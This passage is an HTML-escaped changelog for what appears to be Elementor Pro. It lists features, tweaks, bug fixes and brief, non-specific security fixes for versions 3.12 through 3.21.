href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25860\\\">#25860<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.21.1 - 2024-04-24<\\/h4>\\n<ul>\\n<li>Fix: Excerpt Length setting doesn\'t function correctly for languages with non-English characters in Post Excerpt widget<\\/li>\\n<\\/ul>\\n<h4>3.21.0 - 2024-04-15<\\/h4>\\n<ul>\\n<li>New: Introducing Loop Taxonomy Query - Enabling the display of post and product categories and tags within Loop Grid and Loop Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21372\\\">#21372<\\/a>)<\\/li>\\n<li>Tweak: Optimized Hotspot widget to prevent rendering when no image is provided<\\/li>\\n<li>Tweak: Optimized Blockquote widget to eliminate unnecessary markup when devoid of content<\\/li>\\n<li>Tweak: Optimized Template widget to eliminate unnecessary markup when no template is selected<\\/li>\\n<li>Tweak: Optimized Code Highlight widget to eliminate unnecessary markup when there is no content<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Elementor<\\/li>\\n<li>Tweak: Implemented accessibility improvements in Portfolio widget<\\/li>\\n<li>Tweak: Implemented accessibility improvements of Author Avatar image alt text in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25440\\\">#25440<\\/a>)<\\/li>\\n<li>Tweak: Notes feature merged to version<\\/li>\\n<li>Tweak: Implemented accessibility improvements of Profile Picture alt text in Author widget<\\/li>\\n<li>Fix: Display issue on hover state in WooCommerce Menu Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.20.3 - 2024-04-10<\\/h4>\\n<ul>\\n<li>Fix: Compatibility issue between the My Account widget and other third-party plugins (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20986\\\">#20986<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.20.2 - 2024-03-26<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Media Carousel widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Post Navigation widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Gallery widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Video Playlist widget<\\/li>\\n<\\/ul>\\n<h4>3.20.1 - 2024-03-20<\\/h4>\\n<ul>\\n<li>Fix: Strengthened code integrity in deprecated Woo Single Element widget<\\/li>\\n<li>Fix: PHP error notice appears when using Loop Grid with the Taxonomy Filter widgets<\\/li>\\n<\\/ul>\\n<h4>3.20.0 - 2024-03-11<\\/h4>\\n<ul>\\n<li>Tweak: Implemented OR logic in the Display Conditions feature<\\/li>\\n<li>Tweak: Added X and Threads social networks to Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/25299\\\">#25299<\\/a>)<\\/li>\\n<li>Tweak: Added Archive Title dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image Title dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image Alt dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image Caption dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Author Bio dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Author Email dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Author Website dynamic tag rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Page Title rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Post Title rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Featured Image rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Comments Number rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added Archive Author rule in Display Conditions feature<\\/li>\\n<li>Tweak: Added support for WordPress Custom Fields in Display Conditions feature<\\/li>\\n<li>Tweak: Implemented accessibility improvements in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23875\\\">#23875<\\/a>)<\\/li>\\n<li>Tweak: Implemented accessibility improvements in Login widget<\\/li>\\n<li>Tweak: Added additional style controls in the Table of Contents widget<\\/li>\\n<li>Tweak: Added Transition Duration option in Blockquote widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21295\\\">#21295<\\/a>)<\\/li>\\n<li>Tweak: Added Transition Duration to button in Flip Box widget<\\/li>\\n<li>Tweak: Added Transition Duration to button in Author Box widget<\\/li>\\n<li>Tweak: Added Transition Duration to List in Table of Contents widget<\\/li>\\n<li>Tweak: Added Transition Duration to button in Login widget<\\/li>\\n<li>Tweak: Added Transition Duration in Post Navigation widget<\\/li>\\n<li>Tweak: Added Transition Duration Show More in Video Playlist widget<\\/li>\\n<li>Tweak: Added Transition Duration to button in Form widget<\\/li>\\n<li>Tweak: Removed separator-none argument from all Editor controls<\\/li>\\n<li>Tweak: Add <code><time><\\/code> wrapper for Date and Time items in Post Info widget<\\/li>\\n<li>Tweak: Page Transitions feature merged to version<\\/li>\\n<li>Tweak: Scroll Snap feature merged to version<\\/li>\\n<li>Tweak: Promoted Display Conditions feature to Beta status and activated for new sites<\\/li>\\n<li>Tweak: Promoted Taxonomy Filter feature to beta status and activated for new sites<\\/li>\\n<li>Fix: Page Transitions feature and Load Font Awesome 4 Support cause a console error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18885\\\">#18885<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19334\\\">#19334<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21082\\\">#21082<\\/a>)<\\/li>\\n<li>Fix: Added better output escaping in Taxonomy Filter widget<\\/li>\\n<\\/ul>\\n<h4>3.19.3 - 2024-02-26<\\/h4>\\n<ul>\\n<li>Tweak: Improved Loop CSS loading structure in Loop Grid item<\\/li>\\n<li>Security Fix: Addressed security weaknesses in Dynamic Tags<\\/li>\\n<\\/ul>\\n<h4>3.19.2 - 2024-02-07<\\/h4>\\n<ul>\\n<li>Fix: Export data inconsistencies when using form actions in Form widget<\\/li>\\n<\\/ul>\\n<h4>3.19.1 - 2024-02-05<\\/h4>\\n<ul>\\n<li>Fix: Enqueuing non-existing Loop Template CSS file in Loop Item template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24959\\\">#24959<\\/a>)<\\/li>\\n<li>Fix: Improved code security enforcement in Countdown widget<\\/li>\\n<\\/ul>\\n<h4>3.19.0 - 2024-01-29<\\/h4>\\n<ul>\\n<li>New: Introducing Display Conditions for Elements - allowing users to customize content visibility based on specified criteria (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4246\\\">#4246<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21152\\\">#21152<\\/a>)<\\/li>\\n<li>New: Implemented Akismet Integration for enhanced spam protection and security in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11401\\\">#11401<\\/a>)<\\/li>\\n<li>New: Introducing Permissions functionality to Element Manager - providing users with enhanced control over access and management capabilities<\\/li>\\n<li>Tweak: Added styling option for dropdown indicator in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21907\\\">#21907<\\/a>)<\\/li>\\n<li>Tweak: Added additional size units and custom units in all elements<\\/li>\\n<li>Tweak: Implemented CSS logical properties in WordPress Menu widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Reviews widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Countdown widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Elementor Editor<\\/li>\\n<li>Tweak: Updated <code>jquery.smartmenus.js<\\/code> version from 1.1.1 to 1.2.0<\\/li>\\n<li>Fix: Dynamic Background Image does not load on the first Loop Item in a Loop Grid (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21489\\\">#21489<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22368\\\">#22368<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23085\\\">#23085<\\/a>)<\\/li>\\n<li>Fix: History panel deprecation notices in console log<\\/li>\\n<li>Fix: Second Pro rollback installed the latest version instead of the specifically selected older version<\\/li>\\n<li>Fix: Incorrect position of the dropdown content when applying entrance animation in Menu Widget<\\/li>\\n<li>Fix: UX issues when using in-place editing in Menu widget<\\/li>\\n<li>Fix: Pagination with page reload is not working when used with the Taxonomy filter and Loop Grid widget in Archive template<\\/li>\\n<\\/ul>\\n<h4>3.18.2 - 2023-12-20<\\/h4>\\n<ul>\\n<li>Fix: Modified controls sanitization to enforce better security policies in Price List widget<\\/li>\\n<li>Fix: Error messages related to loop filter appear on front when using PHP 8.X and <code>WP_DEBUG<\\/code> is true<\\/li>\\n<\\/ul>\\n<h4>3.18.1 - 2023-12-06<\\/h4>\\n<ul>\\n<li>Fix: No results appeared when reloading the page with deep link and de-selecting terms in Taxonomy Filter widget<\\/li>\\n<li>Fix: No results appeared when filtering the Uncategorized category in Filter Taxonomy widget<\\/li>\\n<li>Fix: Notes still available when the Notes feature is deactivated<\\/li>\\n<\\/ul>\\n<h4>3.18.0 - 2023-12-04<\\/h4>\\n<ul>\\n<li>Tweak: Added the ability to upload files as attachments to emails in the File Upload field in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4868\\\">#4868<\\/a>)<\\/li>\\n<li>Tweak: Introduced the capability to design and edit the empty state in the Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24261\\\">#24261<\\/a>)<\\/li>\\n<li>Tweak: Implemented the option to close the menu content area with a click anywhere on the screen in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22686\\\">#22686<\\/a>)<\\/li>\\n<li>Tweak: Improve scrolling behavior inside the content area when there is not enough space in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22712\\\">#22712<\\/a>)<\\/li>\\n<li>Tweak: Expanded breakpoint options in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22488\\\">#22488<\\/a>)<\\/li>\\n<li>Tweak: Added Logical Combination control in Taxonomy Filter widget<\\/li>\\n<li>Tweak: Added additional units to Horizontal and Vertical padding for Dropdown in WordPress Menu widget<\\/li>\\n<li>Tweak: Hide navigation arrows when there is only one slide in Loop Carousel and Carousel widgets<\\/li>\\n<li>Tweak: Added various HTML Tag controls in Video Playlist widget<\\/li>\\n<li>Tweak: Added responsive control to navigation size in Slides, Reviews, Media Carousel and Testimonial Carousel widgets<\\/li>\\n<li>Tweak: Added semantic <code><search><\\/code> wrapper in Search Form widget<\\/li>\\n<li>Tweak: Added semantic <code><search><\\/code> wrapper in Taxonomy Filter widget<\\/li>\\n<li>Tweak: Added Multiple Selection control in Taxonomy Filter widget<\\/li>\\n<li>Fix: Deprecated notice when using ${var} in strings instead of {$var} with PHP 8.2 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23927\\\">#23927<\\/a>)<\\/li>\\n<li>Fix: Dropdown indicator position issue in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23947\\\">#23947<\\/a>)<\\/li>\\n<li>Fix: Dynamic Tags are not available when choosing \'self-hosted\' source in Video widget<\\/li>\\n<li>Fix: Telephone field placeholder is aligned to the left in RTL websites in Form widget<\\/li>\\n<\\/ul>\\n<h4>3.17.1 - 2023-11-01<\\/h4>\\n<ul>\\n<li>Fix: Modified controls sanitization to enforce better security policies in Code Highlight, Form, Lottie, Price List, and Video Playlist widgets<\\/li>\\n<\\/ul>\\n<h4>3.17.0 - 2023-10-25<\\/h4>\\n<ul>\\n<li>Tweak: Added AJAX pagination option or seamless page navigation between content in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1284\\\">#1284<\\/a>)<\\/li>\\n<li>Tweak: Introduced Individual Pagination option when multiple Post widgets are on the same page, providing enhanced control over pagination<\\/li>\\n<li>Tweak: Introduced Individual Pagination option when multiple Loop Grid widgets are on the same page, providing enhanced control over pagination<\\/li>\\n<li>Tweak: Added a None option to the breakpoint options in Menu widget<\\/li>\\n<li>Tweak: Added a horizontal scrolling option in Menu widget<\\/li>\\n<li>Tweak: Upgraded minimum required PHP version to 7.3<\\/li>\\n<li>Tweak: Improved accessibility when minimize button is disabled in Table of Content widget<\\/li>\\n<li>Fix: Table of Content widget without icons displays <code>undefined<\\/code> error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17523\\\">#17523<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17768\\\">#17768<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18463\\\">#18463<\\/a>)<\\/li>\\n<li>Fix: Hover behavior issues on menu items in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23430\\\">#23430<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22431\\\">#22431<\\/a>)<\\/li>\\n<li>Fix: Links inside Loop Carousel are not working on initial load in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23705\\\">#23705<\\/a>)<\\/li>\\n<li>Fix: Popups accessible navigation adds outlines to the wrong first focusable element<\\/li>\\n<li>Fix: Dropdown area aligned to the left side of the screen if contains Tabs widget in Menu widget<\\/li>\\n<li>Fix: Content horizontal position not aligning correctly when used with carousel widgets in Menu widget<\\/li>\\n<li>Fix: Accessibility errors in PageSpeed Insights in Table of Contents widget<\\/li>\\n<\\/ul>\\n<h4>3.16.2 - 2023-09-20<\\/h4>\\n<ul>\\n<li>Fix: Fit to Content dropdown position calculation is incorrect in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23808\\\">#23808<\\/a>)<\\/li>\\n<li>Fix: Reverted hide navigation arrows when there is only one slide in the Loop or Nested carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23804\\\">#23804<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.16.1 - 2023-09-14<\\/h4>\\n<ul>\\n<li>Fix: Dynamic tag for ACF image field is not working as expected (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23757\\\">#23757<\\/a>)<\\/li>\\n<li>Fix: Sticky functionality affects padding values in Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23758\\\">#23758<\\/a>)<\\/li>\\n<li>Fix: HTML list issues for padding and margin in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.16.0 - 2023-09-12<\\/h4>\\n<ul>\\n<li>Tweak: Implemented accessibility improvements in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23607\\\">#23607<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22554\\\">#22554<\\/a>)<\\/li>\\n<li>Fix: \'Fallback: Recent Posts\' option malfunctions in the Query control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21436\\\">#21436<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23259\\\">#23259<\\/a>)<\\/li>\\n<li>Tweak: Hide navigation arrows when there is only one slide in the Loop or Nested carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22056\\\">#22056<\\/a>)<\\/li>\\n<li>Tweak: Used appropriate image <code>alt<\\/code> in Testimonial Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17680\\\">#17680<\\/a>)<\\/li>\\n<li>Tweak: Optimized Scroll Snap functionality when using Container widget<\\/li>\\n<li>Tweak: Enhanced Elementor Role Manager functionality when using Containers<\\/li>\\n<li>Tweak: Added Notes feature to the Editor Top Bar<\\/li>\\n<li>Tweak: Replace CSS <code>float<\\/code> with other layouts in the Editor<\\/li>\\n<li>Tweak: Upgraded HTML Structure for the Menu widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Carousel and Menu widgets<\\/li>\\n<li>Tweak: Added keyboard accessibility to a link in Posts widget<\\/li>\\n<li>Tweak: Loop Builder feature merged to version<\\/li>\\n<li>Fix: Addressed inconsistency in hover effect durations between icon, dropdown indicator colors, and text colors in the Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22376\\\">#22376<\\/a>)<\\/li>\\n<li>Fix: Slides break if the parent container is set to HTML A tag in Loop Carousel and Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22678\\\">#22678<\\/a>)<\\/li>\\n<li>Fix: The icon size setting is not affecting uploaded SVG icons in the Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22372\\\">#22372<\\/a>)<\\/li>\\n<li>Fix: Taxonomy filter does not work with slug in foreign characters (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23315\\\">#23315<\\/a>)<\\/li>\\n<li>Fix: Improved code security enforcement in Dynamic Tags<\\/li>\\n<li>Fix: Sticky container incorrectly adjusts its width when transitioning from a smaller breakpoint to a larger one within the Editor<\\/li>\\n<\\/ul>\\n<h4>3.15.1 - 2023-08-09<\\/h4>\\n<ul>\\n<li>Fix: Improved code security enforcement in Table of Contents widget<\\/li>\\n<\\/ul>\\n<h4>3.15.0 - 2023-07-31<\\/h4>\\n<ul>\\n<li>New: Introducing Taxonomy Filter widget - Empower visitors to seamlessly filter listings in Loop Grids based on taxonomies (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3140\\\">#3140<\\/a>)<\\/li>\\n<li>Tweak: Added an "Offset Sides" functionality in Carousel and Loop Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21114\\\">#21114<\\/a>)<\\/li>\\n<li>Tweak: Modified the size of the Publish button in the Editor Top Bar feature (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22472\\\">#22472<\\/a>)<\\/li>\\n<li>Tweak: Improved Ajax permissions functionality for better security enforcement<\\/li>\\n<li>Tweak: Added option for pagination custom position in Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Added option for navigation custom position in Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Added additional styling options for navigation in Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Added labels to shortcode column in WordPress admin<\\/li>\\n<li>Tweak: Unified the appearance of <code>stretch<\\/code> and <code>center<\\/code> buttons in Menu widget<\\/li>\\n<li>Tweak: Unified the appearance of <code>stretch<\\/code> and <code>center<\\/code> buttons in My Account widget<\\/li>\\n<li>Tweak: Improved panel UI in Video Playlist widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Elementor Editor<\\/li>\\n<li>Tweak: Added "Title HTML Tag" and "Description HTML Tag" in Price List widget<\\/li>\\n<li>Tweak: Added "Title HTML Tag" and "Description HTML Tag" in Slides widget<\\/li>\\n<li>Tweak: Added "Title HTML Tag" and "Description HTML Tag" in Flip Box widget<\\/li>\\n<li>Tweak: Added "Description HTML Tag" in Call To Action widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Share Buttons widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Fix: WooCommerce Status page failed to recognize Elementor WooCommerce widgets<\\/li>\\n<li>Fix: Pagination does not work inside single templates when using Posts and Loop Grid widgets<\\/li>\\n<li>Fix: Incorrect saving of WooCommerce page settings in Elementor site settings under certain scenarios<\\/li>\\n<\\/ul>\\n<h4>3.14.1 - 2023-06-26<\\/h4>\\n<ul>\\n<li>Tweak: Improved navigation on touch devices in Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22827\\\">#22827<\\/a>)<\\/li>\\n<li>Fix: Missing navigation arrows on lightbox in Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22870\\\">#22870<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.14.0 - 2023-06-19<\\/h4>\\n<ul>\\n<li>New: Introducing Carousel widget - Infinite design possibilities, and nesting capabilities (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2587\\\">#2587<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/219\\\">#219<\\/a>)<\\/li>\\n<li>Tweak: Added Static Item Position functionality to Alternate template in Loop Grid widget<\\/li>\\n<li>Tweak: Added visual indication of Page Parts<\\/li>\\n<li>Tweak: Added dividers option between menu items in Menu widget<\\/li>\\n<li>Tweak: Changed the HTML structure of Pagination and Navigation in Loop Carousel and Nested Carousel widgets<\\/li>\\n<li>Tweak: Added shop page in WooCommerce Pages section in Site Settings<\\/li>\\n<li>Tweak: Added Text Shadow, Box Shadow and Padding control to button in Call to Action widget<\\/li>\\n<li>Tweak: Added Lazy Load support for images in Video Playlist widget<\\/li>\\n<li>Tweak: Added <code>alt<\\/code> attribute to images in Video Playlist widget<\\/li>\\n<li>Tweak: Replaced select control with choose control for Flip Direction control in Flip Box widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Use <code>media_types<\\/code> array in Media controls<\\/li>\\n<li>Fix: Lightbox is still enabled after disabling it in the Site Settings in Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11193\\\">#11193<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19871\\\">#19871<\\/a>)<\\/li>\\n<li>Fix: Responsive settings for templates don\'t work as expected when Additional Custom Breakpoints feature is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16819\\\">#16819<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19394\\\">#19394<\\/a>)<\\/li>\\n<li>Fix: Inner containers are not presented as expected in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21813\\\">#21813<\\/a>)<\\/li>\\n<li>Fix: Popup width does not support percentages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22413\\\">#22413<\\/a>)<\\/li>\\n<li>Fix: PHP 8.x throws errors when using WooCommerce Ajax response (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22199\\\">#22199<\\/a>)<\\/li>\\n<li>Fix: Mini cart template appears as empty in various scenarios in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22789\\\">#22789<\\/a>)<\\/li>\\n<li>Fix: Order by Price doesn\'t work for the Latest products or Manual Selection in Products widget<\\/li>\\n<li>Fix: Dropdown indicator icon is not vertically aligned to the text when using icon in Menu Widget<\\/li>\\n<li>Fix: Mixed content warning in the console for Video Playlist widget<\\/li>\\n<li>Fix: Preview settings are not presented as expected after first save in Loop Template<\\/li>\\n<li>Fix: Not-crawlable link error in Video Playlist widget<\\/li>\\n<li>Fix: Lightbox is still enabled after disabling it in the Site Settings in Logo widget<\\/li>\\n<li>Fix: Focus state issue on page load when using Table of Content widget<\\/li>\\n<\\/ul>\\n<h4>3.13.2 - 2023-05-22<\\/h4>\\n<ul>\\n<li>Fix: Hover settings not working as expected on Touch-Enabled devices in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22258\\\">#22258<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.13.1 - 2023-05-11<\\/h4>\\n<ul>\\n<li>Security Fix: Addressed security weaknesses in access management related functions<\\/li>\\n<li>Fix: Excerpt content pulled from post content is showing with HTML tags in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22367\\\">#22367<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.13.0 - 2023-05-08<\\/h4>\\n<ul>\\n<li>Tweak: Provided an option to assign excerpt automatically from post content in Post Excerpt dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20256\\\">#20256<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21715\\\">#21715<\\/a>)<\\/li>\\n<li>Tweak: Added Display Conditions functionality in Editor Top bar (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21675\\\">#21675<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22050\\\">#22050<\\/a>)<\\/li>\\n<li>Tweak: Removed <code>elementor_page_id<\\/code> from request URLs in the WC AJAX calls (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18675\\\">#18675<\\/a>)<\\/li>\\n<li>Tweak: Added icons to menu items in Mega Menu widget (<a href=\\\"https:\\/\\/github.com\\/orgs\\/elementor\\/discussions\\/21602\\\">#21602<\\/a>)<\\/li>\\n<li>Tweak: Added keyboard accessibility to Toggle Button in WordPress Menu widget (<a href=\\\"https:\\/\\/github.com\\/orgs\\/elementor\\/discussions\\/2348\\\">#2348<\\/a>)<\\/li>\\n<li>Tweak: Added \'Active item state\' to top-level menu items for anchor links in the Menu widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to navigation arrows in Loop Carousel widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to navigation arrows in Slides widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to navigation arrows in Media, Testimonial and Reviews Carousel widgets<\\/li>\\n<li>Tweak: Added keyboard accessibility to Table of Content widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to Search Form widget<\\/li>\\n<li>Tweak: Added accessibility to images in Slides widget<\\/li>\\n<li>Tweak: Added accessibility to images in Call To Action widget<\\/li>\\n<li>Tweak: Added accessibility to images in Media Carousel widget<\\/li>\\n<li>Tweak: Added accessibility to images in Gallery widget<\\/li>\\n<li>Tweak: Added Lazy Load support for avatar image in Post Info widget<\\/li>\\n<li>Tweak: Added Lazy Load support to various Elementor Editor and Admin images<\\/li>\\n<li>Tweak: Added Lazy Load support for author image in Author Box widget<\\/li>\\n<li>Tweak: Added Lazy Load support for images in Price List widget<\\/li>\\n<li>Fix: Content width is affected by the widget\'s width when Content Width is set to Fit to Content in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21842\\\">#21842<\\/a>)<\\/li>\\n<li>Fix: Empty value on Rows field causes an error in Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21451\\\">#21451<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.12.2 - 2023-04-09<\\/h4>\\n<ul>\\n<li>Fix: Mini cart template appears as empty in various WordPress themes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21836\\\">#21836<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.12.1 - 2023-04-02<\\/h4>\\n<ul>\\n<li>Fix: Default background colors are presented as transparent in Popup (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21824\\\">#21824<\\/a>)<\\/li>\\n<li>Fix: Reverted the tweak of Form Submissions feature merged to the version (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21821\\\">#21821<\\/a>)<\\/li>\\n<li>Fix: Dropdown area is not closing when hovering outside of the content area in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.12.0 - 2023-03-29<\\/h4>\\n<ul>\\n<li>New: Introducing the Mega Menu with the new Menu widget - empowers you to achieve a much higher level of menu design, customization, and creativity<\\/li>\\n<li>New: Diversify your design with a Loop Alternate template - apply another template within your Loop Grid for design creativity<\\/li>\\n<li>New: Kickstart your workflow with predesigned Loop container-based templates<\\/li>\\n<li>Tweak: Added custom icon controls to various locations in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13678\\\">#13678<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17941\\\">#17941<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19295\\\">#19295<\\/a>)<\\/li>\\n<li>Tweak: Added a spacing control between navigation and slides in the Loop Carousel<\\/li>\\n<li>Tweak: Added responsive control to the \'Gap between slides\' control in the Loop Carousel<\\/li>\\n<li>Tweak: Added Custom CSS section in Loop Item template<\\/li>\\n<li>Tweak: Added an Article class metadata in Loop Item template<\\/li>\\n<li>Tweak: Added Lazy Load support for background images in CTA widget when using the Lazy Load Background Images experiment<\\/li>\\n<li>Tweak: Added Lazy Load support for background images in Flipbox widget when using the Lazy Load Background Images experiment<\\/li>\\n<li>Tweak: Added additional size units and custom units in all elements<\\/li>\\n<li>Tweak: Changed Nav Menu widget name to WordPress Menu widget<\\/li>\\n<li>Tweak: Added "Form Validation" control to Form widget<\\/li>\\n<li>Tweak: Updated custom messages in the Form widget<\\/li>\\n<li>Tweak: Improved accessibility in various elements in Gallery widget<\\/li>\\n<li>Tweak: Form Submissions feature merged to version<\\/li>\\n<li>Tweak: Loop feature promoted to Stable status<\\/li>\\n<li>Tweak: Page Transitions feature promoted to Stable status<\\/li>\\n<li>Tweak: Improved accessibility in filter bar in Gallery widget<\\/li>\\n<li>Tweak: Remove unused <code>aspect-ratio-*<\\/code> CSS classes<\\/li>\\n<li>Fix: Not all active breakpoints appear under "Advanced 